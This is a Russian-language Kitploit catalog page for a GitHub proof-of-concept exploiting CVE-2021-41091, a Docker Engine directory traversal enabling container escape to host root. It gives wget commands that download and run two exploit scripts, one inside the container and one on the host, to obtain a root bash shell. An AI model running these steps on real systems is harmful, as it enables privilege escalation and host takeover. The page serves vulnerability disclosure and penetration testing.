Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41091 — Доказательство концепции эксплуатации уязвимости CVE-2021-41091: обход каталогов в Moby (Docker Engine), позволяющий непривилегированным пользователям выполнять SUID-бинарные файлы из контейнера на хосте. Включает PoC-скрипты для Ubuntu 20.04. | Kitploit
Инструменты/GitHubGitHub/jrbh4ck/cve-2021-41091
Повышение привилегийБезопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеПобег из Контейнера
GitHubjrbh4ck/cve-2021-41091

CVE-2021-41091

Доказательство концепции эксплуатации уязвимости CVE-2021-41091: обход каталогов в Moby (Docker Engine), позволяющий непривилегированным пользователям выполнять SUID-бинарные файлы из контейнера на хосте. Включает PoC-скрипты для Ubuntu 20.04.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41091

Ошибка в Moby (Docker Engine) позволяет непривилегированным пользователям обходить каталоги и выполнять программы напрямую из Docker на основной машине: если в Docker есть программа с SUID, пользователь сможет выполнить её как SUID на основной машине

PoC

В терминале контейнера скачиваем файл docker.sh, затем запускаем его от root:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh

Теперь на основной машине скачиваем файл principal.sh и запускаем:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh

Запускаем команду, которую выдаст скрипт, и мы сможем выполнить /bin/bash от root

Примечания

Эти скрипты были протестированы на Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) с версией Moby 20.10.5+dfsg1

ИСПОЛЬЗОВАНИЕ ЭТОГО РЕПОЗИТОРИЯ — ОТВЕТСТВЕННОСТЬ ТОГО, КТО ЕГО ИСПОЛЬЗУЕТ, А НЕ АВТОРА

Скачать инструмент